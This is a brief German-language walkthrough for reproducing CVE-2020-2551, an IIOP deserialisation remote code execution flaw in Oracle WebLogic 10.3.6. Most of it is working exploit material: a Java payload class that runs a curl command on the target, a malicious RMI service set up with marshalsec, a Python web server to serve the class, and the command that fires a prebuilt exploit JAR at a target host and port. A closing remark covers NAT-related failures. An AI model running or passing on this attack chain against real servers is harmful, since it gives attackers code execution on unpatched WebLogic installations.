
Weblogic IIOP CVE-2020-2551
Weblogic IIOP Deserialisierung
Weblogic10.3.6+jdk1.6
Vorgepacktes JAR-Paket Extraktionscode: a6ob
Laden Sie das JAR-Paket herunter, starten Sie dann mit marshalsec einen bösartigen RMI-Dienst und kompilieren Sie lokal eine exp.java
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
Kompilieren Sie möglichst mit derselben JDK-Version und denselben Abhängigkeiten (wlfullclient.jar) wie Weblogic. Starten Sie dann lokal einen Webserver
python -m http.server --bind 0.0.0.0 80
Führen Sie das JAR-Paket über die Befehlszeile aus
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
Das tatsächliche Ergebnis ist im Bild zu sehen

Viele berichten, dass die Reproduktion fehlschlägt. Nachdem ich einige Artikel online gelesen hatte, stellte ich fest, dass IIOP ein NAT-Modus-Problem hat. Heute habe ich es auf Xianzhi gefunden: https://xz.aliyun.com/t/7498 . Bitte besuchen Sie den Link selbst.